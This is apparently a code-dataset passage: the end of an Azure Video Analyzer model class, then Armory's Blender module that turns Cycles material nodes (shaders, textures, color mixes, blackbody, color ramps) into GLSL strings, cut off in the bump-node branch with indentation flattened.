'name': {'key': 'name', 'type': 'str'},
'video_name': {'key': 'videoName', 'type': 'str'},
'time_sequences': {'key': 'timeSequences', 'type': 'TimeSequenceBase'},
}
def __init__(
self,
**kwargs
):
super(VideoSource, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.VideoSource' # type: str
self.video_name = kwargs['video_name']
self.time_sequences = kwargs['time_sequences']
| 1.851563 | 2 |
blender/arm/material/cycles.py | philipmduarte/armory | 1 | 4993 | #
# This module builds upon Cycles nodes work licensed as
# Copyright 2011-2013 Blender Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import math
import bpy
import os
import arm.assets
import arm.utils
import arm.make_state
import arm.log
import arm.material.mat_state as mat_state
import arm.material.cycles_functions as c_functions
import shutil
emission_found = False
particle_info = None # Particle info export
def parse(nodes, con, vert, frag, geom, tesc, tese, parse_surface=True, parse_opacity=True, parse_displacement=True, basecol_only=False):
output_node = node_by_type(nodes, 'OUTPUT_MATERIAL')
if output_node != None:
parse_output(output_node, con, vert, frag, geom, tesc, tese, parse_surface, parse_opacity, parse_displacement, basecol_only)
def parse_output(node, _con, _vert, _frag, _geom, _tesc, _tese, _parse_surface, _parse_opacity, _parse_displacement, _basecol_only):
global parsed # Compute nodes only once
global parents
global normal_parsed
global curshader # Active shader - frag for surface / tese for displacement
global con
global vert
global frag
global geom
global tesc
global tese
global parse_surface
global parse_opacity
global basecol_only
global emission_found
global particle_info
global sample_bump
global sample_bump_res
con = _con
vert = _vert
frag = _frag
geom = _geom
tesc = _tesc
tese = _tese
parse_surface = _parse_surface
parse_opacity = _parse_opacity
basecol_only = _basecol_only
emission_found = False
particle_info = {}
particle_info['index'] = False
particle_info['age'] = False
particle_info['lifetime'] = False
particle_info['location'] = False
particle_info['size'] = False
particle_info['velocity'] = False
particle_info['angular_velocity'] = False
sample_bump = False
sample_bump_res = ''
wrd = bpy.data.worlds['Arm']
# Surface
if parse_surface or parse_opacity:
parsed = {}
parents = []
normal_parsed = False
curshader = frag
out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission = parse_shader_input(node.inputs[0])
if parse_surface:
frag.write('basecol = {0};'.format(out_basecol))
frag.write('roughness = {0};'.format(out_roughness))
frag.write('metallic = {0};'.format(out_metallic))
frag.write('occlusion = {0};'.format(out_occlusion))
frag.write('specular = {0};'.format(out_specular))
if '_Emission' in wrd.world_defs:
frag.write('emission = {0};'.format(out_emission))
if parse_opacity:
frag.write('opacity = {0} - 0.0002;'.format(out_opacity))
# Volume
# parse_volume_input(node.inputs[1])
# Displacement
if _parse_displacement and disp_enabled() and node.inputs[2].is_linked:
parsed = {}
parents = []
normal_parsed = False
rpdat = arm.utils.get_rp()
if rpdat.arm_rp_displacement == 'Tessellation' and tese != None:
curshader = tese
else:
curshader = vert
out_disp = parse_displacement_input(node.inputs[2])
curshader.write('vec3 disp = {0};'.format(out_disp))
def parse_group(node, socket): # Entering group
index = socket_index(node, socket)
output_node = node_by_type(node.node_tree.nodes, 'GROUP_OUTPUT')
if output_node == None:
return
inp = output_node.inputs[index]
parents.append(node)
out_group = parse_input(inp)
parents.pop()
return out_group
def parse_group_input(node, socket):
index = socket_index(node, socket)
parent = parents.pop() # Leaving group
inp = parent.inputs[index]
res = parse_input(inp)
parents.append(parent) # Return to group
return res
def parse_input(inp):
if inp.type == 'SHADER':
return parse_shader_input(inp)
elif inp.type == 'RGB':
return parse_vector_input(inp)
elif inp.type == 'RGBA':
return parse_vector_input(inp)
elif inp.type == 'VECTOR':
return parse_vector_input(inp)
elif inp.type == 'VALUE':
return parse_value_input(inp)
def parse_shader_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_shader_input(l.from_node.inputs[0])
return parse_shader(l.from_node, l.from_socket)
else:
out_basecol = 'vec3(0.8)'
out_roughness = '0.0'
out_metallic = '0.0'
out_occlusion = '1.0'
out_specular = '1.0'
out_opacity = '1.0'
out_emission = '0.0'
return out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission
def parse_shader(node, socket):
global emission_found
out_basecol = 'vec3(0.8)'
out_roughness = '0.0'
out_metallic = '0.0'
out_occlusion = '1.0'
out_specular = '1.0'
out_opacity = '1.0'
out_emission = '0.0'
if node.type == 'GROUP':
if node.node_tree.name.startswith('Armory PBR'):
if parse_surface:
# Base color
out_basecol = parse_vector_input(node.inputs[0])
# Occlusion
out_occlusion = parse_value_input(node.inputs[2])
# Roughness
out_roughness = parse_value_input(node.inputs[3])
# Metallic
out_metallic = parse_value_input(node.inputs[4])
# Normal
if node.inputs[5].is_linked and node.inputs[5].links[0].from_node.type == 'NORMAL_MAP':
warn(mat_name() + ' - Do not use Normal Map node with Armory PBR, connect Image Texture directly')
parse_normal_map_color_input(node.inputs[5])
# Emission
if node.inputs[6].is_linked or node.inputs[6].default_value != 0.0:
out_emission = parse_value_input(node.inputs[6])
emission_found = True
if parse_opacity:
out_opacity = parse_value_input(node.inputs[1])
else:
return parse_group(node, socket)
elif node.type == 'GROUP_INPUT':
return parse_group_input(node, socket)
elif node.type == 'MIX_SHADER':
prefix = '' if node.inputs[0].is_linked else 'const '
fac = parse_value_input(node.inputs[0])
fac_var = node_name(node.name) + '_fac'
fac_inv_var = node_name(node.name) + '_fac_inv'
curshader.write('{0}float {1} = {2};'.format(prefix, fac_var, fac))
curshader.write('{0}float {1} = 1.0 - {2};'.format(prefix, fac_inv_var, fac_var))
bc1, rough1, met1, occ1, spec1, opac1, emi1 = parse_shader_input(node.inputs[1])
bc2, rough2, met2, occ2, spec2, opac2, emi2 = parse_shader_input(node.inputs[2])
if parse_surface:
out_basecol = '({0} * {3} + {1} * {2})'.format(bc1, bc2, fac_var, fac_inv_var)
out_roughness = '({0} * {3} + {1} * {2})'.format(rough1, rough2, fac_var, fac_inv_var)
out_metallic = '({0} * {3} + {1} * {2})'.format(met1, met2, fac_var, fac_inv_var)
out_occlusion = '({0} * {3} + {1} * {2})'.format(occ1, occ2, fac_var, fac_inv_var)
out_specular = '({0} * {3} + {1} * {2})'.format(spec1, spec2, fac_var, fac_inv_var)
out_emission = '({0} * {3} + {1} * {2})'.format(emi1, emi2, fac_var, fac_inv_var)
if parse_opacity:
out_opacity = '({0} * {3} + {1} * {2})'.format(opac1, opac2, fac_var, fac_inv_var)
elif node.type == 'ADD_SHADER':
bc1, rough1, met1, occ1, spec1, opac1, emi1 = parse_shader_input(node.inputs[0])
bc2, rough2, met2, occ2, spec2, opac2, emi2 = parse_shader_input(node.inputs[1])
if parse_surface:
out_basecol = '({0} + {1})'.format(bc1, bc2)
out_roughness = '({0} * 0.5 + {1} * 0.5)'.format(rough1, rough2)
out_metallic = '({0} * 0.5 + {1} * 0.5)'.format(met1, met2)
out_occlusion = '({0} * 0.5 + {1} * 0.5)'.format(occ1, occ2)
out_specular = '({0} * 0.5 + {1} * 0.5)'.format(spec1, spec2)
out_emission = '({0} * 0.5 + {1} * 0.5)'.format(emi1, emi2)
if parse_opacity:
out_opacity = '({0} * 0.5 + {1} * 0.5)'.format(opac1, opac2)
elif node.type == 'BSDF_PRINCIPLED':
if parse_surface:
write_normal(node.inputs[19])
out_basecol = parse_vector_input(node.inputs[0])
# subsurface = parse_vector_input(node.inputs[1])
# subsurface_radius = parse_vector_input(node.inputs[2])
# subsurface_color = parse_vector_input(node.inputs[3])
out_metallic = parse_value_input(node.inputs[4])
out_specular = parse_value_input(node.inputs[5])
# specular_tint = parse_vector_input(node.inputs[6])
out_roughness = parse_value_input(node.inputs[7])
# aniso = parse_vector_input(node.inputs[8])
# aniso_rot = parse_vector_input(node.inputs[9])
# sheen = parse_vector_input(node.inputs[10])
# sheen_tint = parse_vector_input(node.inputs[11])
# clearcoat = parse_vector_input(node.inputs[12])
# clearcoat_rough = parse_vector_input(node.inputs[13])
# ior = parse_vector_input(node.inputs[14])
# transmission = parse_vector_input(node.inputs[15])
# transmission_roughness = parse_vector_input(node.inputs[16])
if node.inputs[17].is_linked or node.inputs[17].default_value[0] != 0.0:
out_emission = '({0}.x)'.format(parse_vector_input(node.inputs[17]))
emission_found = True
            # clearcoat_normal = parse_vector_input(node.inputs[20])
# tangent = parse_vector_input(node.inputs[21])
if parse_opacity:
if len(node.inputs) > 20:
out_opacity = parse_value_input(node.inputs[18])
elif node.type == 'BSDF_DIFFUSE':
if parse_surface:
write_normal(node.inputs[2])
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = parse_value_input(node.inputs[1])
out_specular = '0.0'
elif node.type == 'BSDF_GLOSSY':
if parse_surface:
write_normal(node.inputs[2])
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = parse_value_input(node.inputs[1])
out_metallic = '1.0'
elif node.type == 'AMBIENT_OCCLUSION':
if parse_surface:
# Single channel
out_occlusion = parse_vector_input(node.inputs[0]) + '.r'
elif node.type == 'BSDF_ANISOTROPIC':
if parse_surface:
write_normal(node.inputs[4])
# Revert to glossy
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = parse_value_input(node.inputs[1])
out_metallic = '1.0'
elif node.type == 'EMISSION':
if parse_surface:
# Multiply basecol
out_basecol = parse_vector_input(node.inputs[0])
out_emission = '1.0'
emission_found = True
emission_strength = parse_value_input(node.inputs[1])
out_basecol = '({0} * {1})'.format(out_basecol, emission_strength)
elif node.type == 'BSDF_GLASS':
if parse_surface:
write_normal(node.inputs[3])
out_roughness = parse_value_input(node.inputs[1])
if parse_opacity:
out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0]))
elif node.type == 'BSDF_HAIR':
pass
elif node.type == 'HOLDOUT':
if parse_surface:
# Occlude
out_occlusion = '0.0'
elif node.type == 'BSDF_REFRACTION':
# write_normal(node.inputs[3])
pass
elif node.type == 'SUBSURFACE_SCATTERING':
if parse_surface:
write_normal(node.inputs[4])
out_basecol = parse_vector_input(node.inputs[0])
elif node.type == 'BSDF_TOON':
# write_normal(node.inputs[3])
pass
elif node.type == 'BSDF_TRANSLUCENT':
if parse_surface:
write_normal(node.inputs[1])
if parse_opacity:
out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0]))
elif node.type == 'BSDF_TRANSPARENT':
if parse_opacity:
out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0]))
elif node.type == 'BSDF_VELVET':
if parse_surface:
write_normal(node.inputs[2])
out_basecol = parse_vector_input(node.inputs[0])
out_roughness = '1.0'
out_metallic = '1.0'
elif node.type == 'VOLUME_ABSORPTION':
pass
elif node.type == 'VOLUME_SCATTER':
pass
return out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission
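# Illustrative sketch (not called by the exporter): the MIX_SHADER branch above emits a
# plain linear blend in GLSL, e.g. basecol = a * (1 - fac) + b * fac. This helper only
# builds such a string from placeholder operand names to make the emitted form visible.
def _example_mix_blend_glsl(a='brdf_a_basecol', b='brdf_b_basecol', fac='node_mix_fac'):
    fac_inv = '(1.0 - {0})'.format(fac)
    return '({0} * {1} + {2} * {3})'.format(a, fac_inv, b, fac)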
def parse_displacement_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_displacement_input(l.from_node.inputs[0])
return parse_vector_input(inp)
else:
return None
def parse_vector_input(inp):
if inp.is_linked:
l = inp.links[0]
if l.from_node.type == 'REROUTE':
return parse_vector_input(l.from_node.inputs[0])
res_var = write_result(l)
st = l.from_socket.type
if st == 'RGB' or st == 'RGBA' or st == 'VECTOR':
return res_var
else: # VALUE
return 'vec3({0})'.format(res_var)
else:
if inp.type == 'VALUE': # Unlinked reroute
return to_vec3([0.0, 0.0, 0.0])
else:
if mat_batch() and inp.is_uniform:
return to_uniform(inp)
else:
return to_vec3(inp.default_value)
def parse_vector(node, socket):
global particle_info
global sample_bump
global sample_bump_res
# RGB
if node.type == 'GROUP':
return parse_group(node, socket)
elif node.type == 'GROUP_INPUT':
return parse_group_input(node, socket)
elif node.type == 'VERTEX_COLOR':
con.add_elem('col', 'short4norm') # Vcols only for now
return 'vcolor'
elif node.type == 'ATTRIBUTE':
if socket == node.outputs[0]: # Color
con.add_elem('col', 'short4norm') # Vcols only for now
return 'vcolor'
else: # Vector
con.add_elem('tex', 'short2norm') # UVMaps only for now
mat = mat_get_material()
mat_users = mat_get_material_users()
if mat_users != None and mat in mat_users:
mat_user = mat_users[mat][0]
if hasattr(mat_user.data, 'uv_layers'): # No uvlayers for Curve
lays = mat_user.data.uv_layers
# Second uvmap referenced
if len(lays) > 1 and node.attribute_name == lays[1].name:
con.add_elem('tex1', 'short2norm')
return 'vec3(texCoord1.x, 1.0 - texCoord1.y, 0.0)'
return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)'
elif node.type == 'RGB':
if node.arm_material_param:
nn = 'param_' + node_name(node.name)
curshader.add_uniform('vec3 {0}'.format(nn), link='{0}'.format(node.name))
return nn
else:
return to_vec3(socket.default_value)
elif node.type == 'TEX_BRICK':
curshader.add_function(c_functions.str_tex_brick)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
col1 = parse_vector_input(node.inputs[1])
col2 = parse_vector_input(node.inputs[2])
col3 = parse_vector_input(node.inputs[3])
scale = parse_value_input(node.inputs[4])
res = 'tex_brick({0} * {4}, {1}, {2}, {3})'.format(co, col1, col2, col3, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_CHECKER':
curshader.add_function(c_functions.str_tex_checker)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
col1 = parse_vector_input(node.inputs[1])
col2 = parse_vector_input(node.inputs[2])
scale = parse_value_input(node.inputs[3])
res = 'tex_checker({0}, {1}, {2}, {3})'.format(co, col1, col2, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_ENVIRONMENT':
# Pass through
return to_vec3([0.0, 0.0, 0.0])
elif node.type == 'TEX_GRADIENT':
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
grad = node.gradient_type
if grad == 'LINEAR':
f = '{0}.x'.format(co)
elif grad == 'QUADRATIC':
f = '0.0'
elif grad == 'EASING':
f = '0.0'
elif grad == 'DIAGONAL':
f = '({0}.x + {0}.y) * 0.5'.format(co)
elif grad == 'RADIAL':
f = 'atan({0}.y, {0}.x) / PI2 + 0.5'.format(co)
elif grad == 'QUADRATIC_SPHERE':
f = '0.0'
elif grad == 'SPHERICAL':
f = 'max(1.0 - sqrt({0}.x * {0}.x + {0}.y * {0}.y + {0}.z * {0}.z), 0.0)'.format(co)
res = 'vec3(clamp({0}, 0.0, 1.0))'.format(f)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_IMAGE':
# Already fetched
if is_parsed(store_var_name(node)):
return '{0}.rgb'.format(store_var_name(node))
tex_name = node_name(node.name)
tex = make_texture(node, tex_name)
tex_link = node.name if node.arm_material_param else None
if tex != None:
curshader.write_textures += 1
to_linear = node.image != None and node.image.colorspace_settings.name == 'sRGB'
res = '{0}.rgb'.format(texture_store(node, tex, tex_name, to_linear, tex_link=tex_link))
curshader.write_textures -= 1
return res
elif node.image == None: # Empty texture
tex = {}
tex['name'] = tex_name
tex['file'] = ''
return '{0}.rgb'.format(texture_store(node, tex, tex_name, to_linear=False, tex_link=tex_link))
else:
global parsed
tex_store = store_var_name(node) # Pink color for missing texture
parsed[tex_store] = True
curshader.write_textures += 1
curshader.write('vec4 {0} = vec4(1.0, 0.0, 1.0, 1.0);'.format(tex_store))
curshader.write_textures -= 1
return '{0}.rgb'.format(tex_store)
elif node.type == 'TEX_MAGIC':
curshader.add_function(c_functions.str_tex_magic)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'tex_magic({0} * {1} * 4.0)'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_MUSGRAVE':
curshader.add_function(c_functions.str_tex_musgrave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
res = 'vec3(tex_musgrave_f({0} * {1} * 0.5))'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_NOISE':
curshader.add_function(c_functions.str_tex_noise)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
# detail = parse_value_input(node.inputs[2])
# distortion = parse_value_input(node.inputs[3])
# Slow..
res = 'vec3(tex_noise({0} * {1}), tex_noise({0} * {1} + 0.33), tex_noise({0} * {1} + 0.66))'.format(co, scale)
if sample_bump:
write_bump(node, res, 0.1)
return res
elif node.type == 'TEX_POINTDENSITY':
# Pass through
return to_vec3([0.0, 0.0, 0.0])
elif node.type == 'TEX_SKY':
# Pass through
return to_vec3([0.0, 0.0, 0.0])
elif node.type == 'TEX_VORONOI':
curshader.add_function(c_functions.str_tex_voronoi)
assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png')
assets_add_embedded_data('noise256.png')
curshader.add_uniform('sampler2D snoise256', link='$noise256.png')
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
if node.coloring == 'INTENSITY':
res = 'vec3(tex_voronoi({0} * {1}).a)'.format(co, scale)
else: # CELLS
res = 'tex_voronoi({0} * {1}).rgb'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'TEX_WAVE':
curshader.add_function(c_functions.str_tex_wave)
if node.inputs[0].is_linked:
co = parse_vector_input(node.inputs[0])
else:
co = 'bposition'
scale = parse_value_input(node.inputs[1])
res = 'vec3(tex_wave_f({0} * {1}))'.format(co, scale)
if sample_bump:
write_bump(node, res)
return res
elif node.type == 'BRIGHTCONTRAST':
out_col = parse_vector_input(node.inputs[0])
bright = parse_value_input(node.inputs[1])
contr = parse_value_input(node.inputs[2])
curshader.add_function(c_functions.str_brightcontrast)
return 'brightcontrast({0}, {1}, {2})'.format(out_col, bright, contr)
elif node.type == 'GAMMA':
out_col = parse_vector_input(node.inputs[0])
gamma = parse_value_input(node.inputs[1])
return 'pow({0}, vec3({1}))'.format(out_col, gamma)
elif node.type == 'HUE_SAT':
curshader.add_function(c_functions.str_hue_sat)
hue = parse_value_input(node.inputs[0])
sat = parse_value_input(node.inputs[1])
val = parse_value_input(node.inputs[2])
fac = parse_value_input(node.inputs[3])
col = parse_vector_input(node.inputs[4])
return 'hue_sat({0}, vec4({1}-0.5, {2}, {3}, 1.0-{4}))'.format(col, hue, sat, val, fac)
elif node.type == 'INVERT':
fac = parse_value_input(node.inputs[0])
out_col = parse_vector_input(node.inputs[1])
return 'mix({0}, vec3(1.0) - ({0}), {1})'.format(out_col, fac)
elif node.type == 'MIX_RGB':
fac = parse_value_input(node.inputs[0])
fac_var = node_name(node.name) + '_fac'
curshader.write('float {0} = {1};'.format(fac_var, fac))
col1 = parse_vector_input(node.inputs[1])
col2 = parse_vector_input(node.inputs[2])
blend = node.blend_type
if blend == 'MIX':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'ADD':
out_col = 'mix({0}, {0} + {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'MULTIPLY':
out_col = 'mix({0}, {0} * {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'SUBTRACT':
out_col = 'mix({0}, {0} - {1}, {2})'.format(col1, col2, fac_var)
elif blend == 'SCREEN':
out_col = '(vec3(1.0) - (vec3(1.0 - {2}) + {2} * (vec3(1.0) - {1})) * (vec3(1.0) - {0}))'.format(col1, col2, fac_var)
elif blend == 'DIVIDE':
out_col = '(vec3((1.0 - {2}) * {0} + {2} * {0} / {1}))'.format(col1, col2, fac_var)
elif blend == 'DIFFERENCE':
out_col = 'mix({0}, abs({0} - {1}), {2})'.format(col1, col2, fac_var)
elif blend == 'DARKEN':
out_col = 'min({0}, {1} * {2})'.format(col1, col2, fac_var)
elif blend == 'LIGHTEN':
out_col = 'max({0}, {1} * {2})'.format(col1, col2, fac_var)
elif blend == 'OVERLAY':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'DODGE':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'BURN':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'HUE':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'SATURATION':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'VALUE':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'COLOR':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
elif blend == 'SOFT_LIGHT':
out_col = '((1.0 - {2}) * {0} + {2} * ((vec3(1.0) - {0}) * {1} * {0} + {0} * (vec3(1.0) - (vec3(1.0) - {1}) * (vec3(1.0) - {0}))))'.format(col1, col2, fac_var)
elif blend == 'LINEAR_LIGHT':
out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix
# out_col = '({0} + {2} * (2.0 * ({1} - vec3(0.5))))'.format(col1, col2, fac_var)
if node.use_clamp:
return 'clamp({0}, vec3(0.0), vec3(1.0))'.format(out_col)
else:
return out_col
elif node.type == 'BLACKBODY':
t = float(parse_value_input(node.inputs[0]))
rgb = [0,0,0]
blackbody_table_r = [
[2.52432244e+03, -1.06185848e-03, 3.11067539e+00],
[3.37763626e+03, -4.34581697e-04, 1.64843306e+00],
[4.10671449e+03, -8.61949938e-05, 6.41423749e-01],
[4.66849800e+03, 2.85655028e-05, 1.29075375e-01],
[4.60124770e+03, 2.89727618e-05, 1.48001316e-01],
[3.78765709e+03, 9.36026367e-06, 3.98995841e-01]
]
blackbody_table_g = [
[-7.50343014e+02, 3.15679613e-04, 4.73464526e-01],
[-1.00402363e+03, 1.29189794e-04, 9.08181524e-01],
[-1.22075471e+03, 2.56245413e-05, 1.20753416e+00],
[-1.42546105e+03, -4.01730887e-05, 1.44002695e+00],
[-1.18134453e+03, -2.18913373e-05, 1.30656109e+00],
[-5.00279505e+02, -4.59745390e-06, 1.09090465e+00]
]
blackbody_table_b = [
[0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0],
[-2.02524603e-11, 1.79435860e-07, -2.60561875e-04, -1.41761141e-02],
[-2.22463426e-13, -1.55078698e-08, 3.81675160e-04, -7.30646033e-01],
[6.72595954e-13, -2.73059993e-08, 4.24068546e-04, -7.52204323e-01]
]
if (t >= 12000):
rgb[0] = 0.826270103
rgb[1] = 0.994478524
rgb[2] = 1.56626022
elif (t < 965.0):
rgb[0] = 4.70366907
rgb[1] = 0.0
rgb[2] = 0.0
else:
if (t >= 6365.0):
i = 5
elif(t >= 3315.0):
i = 4
elif(t >= 1902.0):
i = 3
elif(t >= 1449.0):
i = 2
elif(t >= 1167.0):
i = 1
else:
i = 0
r = blackbody_table_r[i]
g = blackbody_table_g[i]
b = blackbody_table_b[i]
t_inv = 1.0 / t
rgb[0] = r[0] * t_inv + r[1] * t + r[2]
rgb[1] = g[0] * t_inv + g[1] * t + g[2]
rgb[2] = ((b[0] * t + b[1]) * t + b[2]) * t + b[3]
# Pass constant
return to_vec3([rgb[0], rgb[1], rgb[2]])
elif node.type == 'VALTORGB': # ColorRamp
fac = parse_value_input(node.inputs[0])
interp = node.color_ramp.interpolation
elems = node.color_ramp.elements
if len(elems) == 1:
return to_vec3(elems[0].color)
# Write cols array
cols_var = node_name(node.name) + '_cols'
curshader.write('vec3 {0}[{1}];'.format(cols_var, len(elems))) # TODO: Make const
for i in range(0, len(elems)):
curshader.write('{0}[{1}] = vec3({2}, {3}, {4});'.format(cols_var, i, elems[i].color[0], elems[i].color[1], elems[i].color[2]))
# Get index
fac_var = node_name(node.name) + '_fac'
curshader.write('float {0} = {1};'.format(fac_var, fac))
index = '0'
for i in range(1, len(elems)):
index += ' + ({0} > {1} ? 1 : 0)'.format(fac_var, elems[i].position)
# Write index
index_var = node_name(node.name) + '_i'
curshader.write('int {0} = {1};'.format(index_var, index))
if interp == 'CONSTANT':
return '{0}[{1}]'.format(cols_var, index_var)
else: # Linear
# Write facs array
facs_var = node_name(node.name) + '_facs'
curshader.write('float {0}[{1}];'.format(facs_var, len(elems))) # TODO: Make const
for i in range(0, len(elems)):
curshader.write('{0}[{1}] = {2};'.format(facs_var, i, elems[i].position))
# Mix color
# float f = (pos - start) * (1.0 / (finish - start))
return 'mix({0}[{1}], {0}[{1} + 1], ({2} - {3}[{1}]) * (1.0 / ({3}[{1} + 1] - {3}[{1}]) ))'.format(cols_var, index_var, fac_var, facs_var)
elif node.type == 'CURVE_VEC': # Vector Curves
fac = parse_value_input(node.inputs[0])
vec = parse_vector_input(node.inputs[1])
curves = node.mapping.curves
name = node_name(node.name)
# mapping.curves[0].points[0].handle_type # bezier curve
return '(vec3({0}, {1}, {2}) * {3})'.format(\
vector_curve(name + '0', vec + '.x', curves[0].points), vector_curve(name + '1', vec + '.y', curves[1].points), vector_curve(name + '2', vec + '.z', curves[2].points), fac)
elif node.type == 'CURVE_RGB': # RGB Curves
fac = parse_value_input(node.inputs[0])
vec = parse_vector_input(node.inputs[1])
curves = node.mapping.curves
name = node_name(node.name)
# mapping.curves[0].points[0].handle_type
return '(sqrt(vec3({0}, {1}, {2}) * vec3({4}, {5}, {6})) * {3})'.format(\
vector_curve(name + '0', vec + '.x', curves[0].points), vector_curve(name + '1', vec + '.y', curves[1].points), vector_curve(name + '2', vec + '.z', curves[2].points), fac,\
vector_curve(name + '3a', vec + '.x', curves[3].points), vector_curve(name + '3b', vec + '.y', curves[3].points), vector_curve(name + '3c', vec + '.z', curves[3].points))
elif node.type == 'COMBHSV':
curshader.add_function(c_functions.str_hue_sat)
h = parse_value_input(node.inputs[0])
s = parse_value_input(node.inputs[1])
v = parse_value_input(node.inputs[2])
return 'hsv_to_rgb(vec3({0}, {1}, {2}))'.format(h,s,v)
elif node.type == 'COMBRGB':
r = parse_value_input(node.inputs[0])
g = parse_value_input(node.inputs[1])
b = parse_value_input(node.inputs[2])
return 'vec3({0}, {1}, {2})'.format(r, g, b)
elif node.type == 'WAVELENGTH':
curshader.add_function(c_functions.str_wavelength_to_rgb)
wl = parse_value_input(node.inputs[0])
# Roughly map to cycles - 450 to 600 nanometers
return 'wavelength_to_rgb(({0} - 450.0) / 150.0)'.format(wl)
# Vector
elif node.type == 'CAMERA':
# View Vector in camera space
return 'vVecCam'
elif node.type == 'NEW_GEOMETRY':
if socket == node.outputs[0]: # Position
return 'wposition'
elif socket == node.outputs[1]: # Normal
return 'n' if curshader.shader_type == 'frag' else 'wnormal'
elif socket == node.outputs[2]: # Tangent
return 'wtangent'
elif socket == node.outputs[3]: # True Normal
return 'n' if curshader.shader_type == 'frag' else 'wnormal'
elif socket == node.outputs[4]: # Incoming
return 'vVec'
elif socket == node.outputs[5]: # Parametric
return 'mposition'
elif node.type == 'HAIR_INFO':
return 'vec3(0.0)' # Tangent Normal
elif node.type == 'OBJECT_INFO':
return 'wposition'
elif node.type == 'PARTICLE_INFO':
if socket == node.outputs[3]: # Location
particle_info['location'] = True
return 'p_location' if arm.utils.get_rp().arm_particles == 'On' else 'vec3(0.0)'
elif socket == node.outputs[5]: # Velocity
particle_info['velocity'] = True
return 'p_velocity' if arm.utils.get_rp().arm_particles == 'On' else 'vec3(0.0)'
elif socket == node.outputs[6]: # Angular Velocity
particle_info['angular_velocity'] = True
return 'vec3(0.0)'
elif node.type == 'TANGENT':
return 'wtangent'
elif node.type == 'TEX_COORD':
#obj = node.object
#instance = node.from_instance
if socket == node.outputs[0]: # Generated - bounds
return 'bposition'
elif socket == node.outputs[1]: # Normal
return 'n'
elif socket == node.outputs[2]: # UV
con.add_elem('tex', 'short2norm')
return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)'
elif socket == node.outputs[3]: # Object
return 'mposition'
elif socket == node.outputs[4]: # Camera
return 'vec3(0.0)' # 'vposition'
elif socket == node.outputs[5]: # Window
return 'vec3(0.0)' # 'wvpposition'
elif socket == node.outputs[6]: # Reflection
return 'vec3(0.0)'
elif node.type == 'UVMAP':
#instance = node.from_instance
con.add_elem('tex', 'short2norm')
mat = mat_get_material()
mat_users = mat_get_material_users()
if mat_users != None and mat in mat_users:
mat_user = mat_users[mat][0]
if hasattr(mat_user.data, 'uv_layers'):
lays = mat_user.data.uv_layers
# Second uvmap referenced
if len(lays) > 1 and node.uv_map == lays[1].name:
con.add_elem('tex1', 'short2norm')
return 'vec3(texCoord1.x, 1.0 - texCoord1.y, 0.0)'
return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)'
elif node.type == 'BUMP':
# Interpolation strength
strength = parse_value_input(node.inputs[0])
# Height multiplier
# distance = parse_value_input(node.inputs[1])
